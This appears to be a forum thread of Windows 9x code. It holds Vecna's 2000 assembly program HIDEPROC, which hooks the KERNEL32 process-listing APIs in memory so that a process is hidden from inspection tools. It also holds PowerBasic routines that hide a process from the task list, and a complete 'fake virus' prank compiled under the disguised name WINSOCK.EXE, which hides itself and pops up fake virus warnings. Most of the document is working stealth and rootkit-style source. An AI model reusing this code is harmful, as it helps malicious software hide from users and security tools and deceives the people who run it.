Sven-- Under Win9x, use: RegisterServiceProcess(GetCurrentProcessID, Action&) with Action& = 1 to register, 0 to unregister. For NT/2000, you need to write a service.
Tweet
;HIDEPROC - Stealth W9x process
;(c) Vecna 2000
;This program hook Process32First and Process32Next, hiding the EXPLORER.EXE
;process. These KERNEL32 APIs are patched in memory, and redirected to our
;code, that reside in the slack (difference between virtual and physical) of
;the sections of KERNEL32.
;This patch make the selected process invisible to tools like PROCDUMP and
;like. Adding this tech to a prog that already hide itself in CTRL+ALT+DEL
;list make it full invisible.
.386
.model flat
locals
ofs equ offset
by equ byte ptr
wo equ word ptr
dwo equ dword ptr
include pe.inc ;29A inc files
include mz.inc
include win32api.inc
include process.inc ;all include files are in the zip
.data
titulo db "HIDEPROC - Stealth W9x process", 0
msg1 db "KERNEL32 already patched", 0
msg2 db "KERNEL32 has not available space for our code", 0
msg3 db "KERNEL32 patched", 0
dll db "kernel32.dll", 0
api001 db "Process32First", 0
api002 db "Process32Next", 0
vxdcall0 dd 0
IMPLANT EQU THIS BYTE
p32f_entry:
call swap_p32f
push dwo [esp+8] ;buffer
push dwo [esp+8] ;snapshot
call _p32f
test eax, eax
jz @@error ;wasnt sucessful...
call check_name
jnz @@error
call swap_p32f
push dwo [esp+8] ;yeahh, stealth it!
push dwo [esp+8]
call p32n_entry
ret 2*4
@@error:
call swap_p32f
ret 2*4
p32n_entry:
call swap_p32n
@@retry:
push dwo [esp+8] ;buffer
push dwo [esp+8] ;snapshot
call _p32n
test eax, eax
jz @@error ;wasnt sucessful...
call check_name
jz @@retry ;yep, get next
@@error:
call swap_p32n
ret 2*4
check_name:
pushad
mov ebp, [esp+(8*4)+8+4]
lea esi, [ebp.szExeFile] ;get process name
@@go_end:
lodsb
test al, al
jnz @@go_end
mov eax, [esi-9]
or eax, 20202020h
cmp eax, "rero" ;is *orer.??? (EXPLORER.EXE)
popad
ret
_p32f:
mov eax, 12345678h
org $-4
p32f dd 0
jmp eax
_p32n:
mov eax, 12345678h
org $-4
p32n dd 0
jmp eax
delta:
call @@delta
@@delta:
pop ebp
sub ebp, ofs @@delta-IMPLANT
ret
swap_p32f:
push esi edi ebp
call delta
lea esi, [ebp+(ofs p32f_code-IMPLANT)]
mov edi, [ebp+(ofs p32f-IMPLANT)]
call swap ;Process32First
pop ebp edi esi
ret
swap_p32n:
push esi edi ebp
call delta
lea esi, [ebp+(ofs p32n_code-IMPLANT)]
mov edi, [ebp+(ofs p32n-IMPLANT)]
call swap ;Process32Next
pop ebp edi esi
ret
swap:
pushad
mov eax, [edi]
xchg [esi], eax
mov [edi], eax
mov al, [edi+4] ;swap 5-byte buffers
xchg [esi+4], al
mov [edi+4], al
popad
ret
p32n_code db 5 dup (0)
p32f_code db 5 dup (0)
IMPLANT_SIZE EQU $-ofs IMPLANT
.code
extrn GetProcAddress:PROC
extrn ExitProcess:PROC
extrn GetModuleHandleA:PROC
extrn MessageBoxA:PROC
extrn GetCurrentProcess:PROC
extrn VirtualProtect:PROC
extrn GetLastError:PROC
extrn FormatMessageA:PROC
db "(c) Vecna 2000", 0
deprotect:
pushad
mov eax, [esp+(8*4)+4]
and eax, 0fffff000h
ror eax, 12 ;convert address
push 020060000h
push 00h
push 01h
push eax
push 001000dh ;_PageModifyPermissions
mov eax, [vxdcall0]
call eax
popad
ret 4
install:
push ofs dll
call GetModuleHandleA ;get address of kernel32
mov ebx, eax
push ofs api001
push ebx
call GetProcAddress ;init APIs weïll hook
mov [p32f], eax
push ofs api002
push ebx
call GetProcAddress
mov [p32n], eax
mov eax, [ebx.MZ_lfanew]
lea edi, [eax.ebx-4]
cmp dwo [edi], -1
jne @@patch_sys ;kernel32 is already patched?
push 0
push ofs titulo
push ofs msg1 ;show msg and exit...
push 0
call MessageBoxA
jmp @@error
@@patch_sys:
mov esi, [edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export. \
DD_VirtualAddress+4]
mov esi, [esi.ebx.ED_AddressOfFunctions]
mov ecx, [esi.ebx]
add ecx, ebx
mov [vxdcall0], ecx ;get VxDCall0 entry
push edi
call deprotect
mov dwo [edi], -1
movzx ecx, wo [eax.ebx.NT_FileHeader.FH_NumberOfSections]
lea esi, [eax.ebx+SIZE IMAGE_NT_HEADERS]
@@section_loop:
mov eax, [esi.SH_Characteristics]
and eax, IMAGE_SCN_MEM_WRITE + IMAGE_SCN_MEM_READ + IMAGE_SCN_CNT_INITIALIZED_DATA
cmp eax, IMAGE_SCN_MEM_WRITE + IMAGE_SCN_MEM_READ + IMAGE_SCN_CNT_INITIALIZED_DATA
jne @@next_section
mov eax, [esi.SH_SizeOfRawData]
mov edi, [esi.SH_VirtualSize]
sub eax, edi
cmp eax, IMPLANT_SIZE ;section has a slack big enougth
jb @@next_section
add edi, [esi.SH_VirtualAddress]
add edi, ebx ;edi=where write our code
jmp @@copy_code
@@next_section:
add esi, IMAGE_SIZEOF_SECTION_HEADER
loop @@section_loop
push 0
push ofs titulo ;no section can hold us
push ofs msg2 ;show msg and exit...
push 0
call MessageBoxA
jmp @@error
@@copy_code:
mov ebp, edi
mov esi, ofs IMPLANT
mov ecx, IMPLANT_SIZE
cld
rep movsb ;copy implant code to kernel32 mem
mov edi, [p32f]
lea esi, [ebp+(ofs p32f_code-ofs IMPLANT)]
call @@patch
mov eax, ebp
sub eax, edi
mov [edi-4], eax ;redirect it to our code
mov edi, [p32n]
lea esi, [ebp+(ofs p32n_code-ofs IMPLANT)]
call @@patch
lea eax, [ebp+(ofs p32n_entry-ofs IMPLANT)]
sub eax, edi
mov [edi-4], eax ;redirect it to our code
push 0
push ofs titulo
push ofs msg3
push 0
call MessageBoxA
@@error:
push 0
call ExitProcess
@@patch:
push edi
xchg esi, edi
movsb
movsd
mov edi, [esp]
call deprotect
mov al, 0e9h ;build JMP
stosb
stosd
ret
end install
Declare Function RegisterServiceProcess(ByVal dwProcessId As Dword, ByVal dwType As Dword) As Dword
Function ShowHide (dwType As Dword) As Long
Dim hProc As Dword, lResult As Long
hProc = GetProcAddress(LoadLibrary ("Kernel32.Dll"), "RegisterServiceProcess")
If hProc Then Call Dword hProc Using RegisterServiceProcess (GetCurrentProcessId, dwType) To lResult
Function = lResult
End Function
'--------------------------------------------------------------
' Annoying Fake Virus
' Compiler: PBDLL60
' May 30, 2000
' Anti-Gamming Warning, "The Work Loss Specialist"
'--------------------------------------------------------------
$Compile Exe "WINSOCK.EXE" '*Give it a fake name
$Include "WIN32API.INC"
$Resource "AVIRUS.PBR"
'* Hide process from task list equates
%RSP_SIMPLE_SERVICE = 1
%RSP_UNREGISTER_SERVICE = 0
'* Hide process from task list function
DECLARE FUNCTION RegisterServiceProcess Lib "kernel32" _
Alias "RegisterServiceProcess" _
(ByVal dwProcessID As Long, _
ByVal dwType As Long ) As Long
'-----------------------------------------------------
' <<Hide a process from the Task List>>
'
' To hide in tasklist = 0
' To show in tasklist = 1
'
'------------------------------------------------------
Sub ShowInTasklist( ByVal OnOff As Long )
Dim pid As Long
pid = GetCurrentProcessId()
If OnOff Then
RegisterServiceProcess pid, %RSP_UNREGISTER_SERVICE
Else
RegisterServiceProcess pid, %RSP_SIMPLE_SERVICE
End If
End Sub
'----
Global ghInstance As Long
Global TimeTable() AS Long
%ID_TIMER = 1 'Wait and display window timer
%ID_TIMER2 = 2 'Display and hide timer
'--------------------------------------------------------------
'
' <<WinMain>>
'
'
'--------------------------------------------------------------
Function WinMain (ByVal hInstance As Long, _
ByVal hPrevInstance As Long, _
lpCmdLine As Asciiz Ptr, _
ByVal iCmdShow As Long) As Long
Local Msg As tagMsg
Local wndclass As WndClassEx
Local szAppName As Asciiz * 80
Local hWnd As Long
DIM TimeTable(1:10)
ghInstance = hInstance
szAppName = "AVIRUS"
If FindWindow(szAppName ,szAppName) Then Exit Function
wndclass.cbSize = SizeOf(WndClass)
wndclass.style = %CS_HREDRAW OR %CS_VREDRAW
wndclass.lpfnWndProc = CODEPTR( WndProc )
wndclass.cbClsExtra = 0
wndclass.cbWndExtra = 0
wndclass.hInstance = hInstance
wndclass.hIcon = LoadIcon (hInstance, "WINICO")
wndclass.hCursor = LoadCursor( %NULL, ByVal %IDC_ARROW)
wndclass.hbrBackground = GetStockObject(%LTGRAY_BRUSH)
wndclass.lpszMenuName = %NULL
wndclass.lpszClassName = VarPtr( szAppName )
wndclass.hIconSm = LoadIcon( hInstance,"WINICO")
RegisterClassEx wndclass
'--------------------------------------------------------------
'*Get the handle of an existing window and pass this on as the
' parent to this window so we can hide our process from showing
' up on the task bar
'--------------------------------------------------------------
'hdTopWnd& = GetDeskTopWindow()
hNextWnd& = GetTopWindow(hPrevWnd&)
hParent& = GetParent(hNextWnd&)
'--------------------------------------------------------------
'hParent& = %NULL
hWnd = CreateWindowEx(0,szAppName, _
"", _
%WS_POPUP OR %WS_DLGFRAME,_
%CW_USEDEFAULT, _
%CW_USEDEFAULT, _
%CW_USEDEFAULT, _
%CW_USEDEFAULT, _
hParent&, _ '<-- assign to a parent window
%NULL, _
hInstance, _
ByVal %NULL)
'*Hook timer for one interval
If IsFalse(SetTimer(hWnd ,%ID_TIMER ,150000 ,%NULL)) Then
Exit Function
End If
'ShowWindow hWnd, iCmdShow
UpdateWindow hWnd
'*Hide it from the Task List manager
Call ShowInTasklist(0)
While GetMessage(Msg, %NULL, 0, 0)
TranslateMessage Msg
DispatchMessage Msg
Wend
Function = Msg.wParam
End Function
'------------------------------------------------------------
'
' <<Main Window Procedure>>
'
'------------------------------------------------------------
Function WndProc (ByVal hWnd As Long, ByVal wMsg As Long, _
ByVal wParam As Long, ByVal lParam As Long) Export As Long
Local hDC As Long
Local hMemDc As Long
Local Ps As PaintStruct
Local hBitMap As Long
Local nBitMap As Asciiz * 80
Local Bm As BITMAP
Local Tmp As Long
Static Rc As RECT 'preserve x,y window coordinates
Static Cntr As Long 'preserve base timer Counter
Static nRep As Long 'preserve repeat counter
Static tc As Long 'preserve time table counter
Local szWarning As Asciiz*255
'Local MainProgCaption As Asciiz * 80
'Local MainProgClass As Asciiz * 80
nBitMap = "AVIRUS" 'Name of bitmap in pbr file
'---
Select Case wMsg
'---
Case %WM_CREATE
'*resize window to snuggly fit the bitmap,
' and center it and make it topmost
hBitMap = LoadBitmap (ghInstance ,nBitMap)
GetObject hBitMap ,Len(Bm) ,Bm
Rc.nLeft =(GetSystemMetrics(%SM_CXSCREEN) - Bm.bmWidth) / 2
Rc.nTop = (GetSystemMetrics(%SM_CYSCREEN) - Bm.bmHeight) / 2
SetWindowPos hWnd ,%HWND_TOPMOST ,Rc.nLeft ,Rc.nTop ,Bm.bmWidth ,Bm.BmHeight ,0
DeleteObject hBitMap
TimeTable(1) = 300000
TimeTable(2) = 200000
TimeTable(3) = 500000
TimeTable(4) = 250000
TimeTable(5) = 80000
TimeTable(6) = 400000
TimeTable(7) = 140000
TimeTable(8) = 357000
TimeTable(9) = 25000
TimeTable(10) = 780000
'---
Case %WM_PAINT
'Paint bitmap on window
hBitMap = LoadBitmap (ghInstance ,nBitMap)
GetObject hBitMap ,Len(Bm) ,Bm
hDc = BeginPaint(hWnd ,Ps)
hMemDc = CreateCompatibleDc(hDc)
SelectObject hMemDc ,hBitMap
BitBlt hDc ,0 ,0 ,Bm.bmWidth ,Bm.bmHeight ,hMemDc ,0 ,0 ,%SRCCOPY
DeleteDc hMemDc
EndPaint hWnd ,Ps
DeleteObject hBitMap
Function = 0
Exit Function
'---
Case %WM_TIMER
Incr Cntr 'repeat base timer counter
If %ID_TIMER2 <> wParam THEN
If nRep = 100 Then 'Exit program
SendMessage hWnd ,%WM_DESTROY ,%NULL ,%NULL
End If
End if
'* The process is hidding until we reach the desired
' time, say approx every 10 minutes. Once we reach it,
' we display the "Virus Warning" window.
If Cntr = 3 Then
SetWindowPos hWnd,%HWND_TOPMOST,Rc.nLeft ,Rc.nTop,0,0,%SWP_NOSIZE
OpenClipboard hWnd
ShowWindow hWnd,%SW_SHOW
KillTimer hWnd ,%ID_TIMER
SetTimer hWnd ,%ID_TIMER2 ,1500 ,%NULL
End If
'* Let's display it for a few seconds, then exit automatically
' or when the OK button is pressed.
If %ID_TIMER2 = wParam THEN
If Cntr >= 5 Then
KillTimer hWnd, %ID_TIMER2
ShowWindow hWnd, %SW_HIDE
CloseClipboard
Incr nRep 'update number of repeats
Cntr = 0 'clear counter
Incr tc
If tc > 10 then tc = 1
SetTimer hWnd ,%ID_TIMER ,TimeTable(tc) ,%NULL 'reset the timer
'*maybe add a random timer generator and
' add random warning strings.
End If
End If
'---
Case %WM_LBUTTONDOWN
SendMessage hWnd ,%WM_DESTROY ,%NULL ,%NULL
'KillTimer hWnd, %ID_TIMER2
'ShowWindow hWnd, %SW_HIDE
'Incr nRep
'Cntr = 0
'SetTimer hWnd ,%ID_TIMER ,1000 ,%NULL
Function = 0
Exit Function
'---
Case %WM_DESTROY
KillTimer hWnd ,%ID_TIMER
KillTimer hWnd ,%ID_TIMER2
PostQuitMessage 0
Function = 0
Exit Function
End Select
'---
Function = DefWindowProc(hWnd, wMsg, wParam, lParam)
End Function
Comment